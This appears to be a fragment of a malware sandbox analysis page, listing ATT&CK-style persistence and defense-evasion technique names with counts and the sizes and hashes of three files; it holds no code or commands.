1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5db50a89095b067ccfeb651409b330d58
SHA1c835ae089647546aa9043d32c97a49cf22b24e65
SHA2562e41f325648d6f33d709cae1827e4727b635a2ce882fb820609aac174d8b3199
SHA512085261f2a31d62d7c8bd9c58132805fe24560811eb3ca71ab6141584f98097ed969af33e9f0d01a9da5490d8b046a5a9c2451d39562534279c1b15e0b4e4371f
-
Filesize
12KB
MD5275e10d1ddafe30c999d4c244e6b630e
SHA1c4f36027b8a77b185401886ec8827aa59114f4d4
SHA2562b99ebd49bdf81b3485abcbcf03aeee2d5b46751cf82f7c38d715e6d8c8659b0
SHA512a6b81e2602a310ea6728273cc5be5bbdd5b1b9013926a09b0006e99b978dd2fbd50bdd547925601d2869ce6a6bf578f21bdeb6f3e7552fb6cdb63a33a8692863
-
Filesize
684B
MD5fa44d85c1268ea7f10094534ce118264
SHA1d935d86a66fba92ad293ec53637819c2103b37ae
SHA256e52d2980cf17413c02294e82516488d9da202c7865682eba9e287e80b293af3b
SHA512c6e9d9cb94c45198582454b88a321ca441f5174f2889db428afb2a0f89778f8fe8ed227599415f48e1e7109f54a8c51a003eac0d99110a6a3b1db7659d11f01f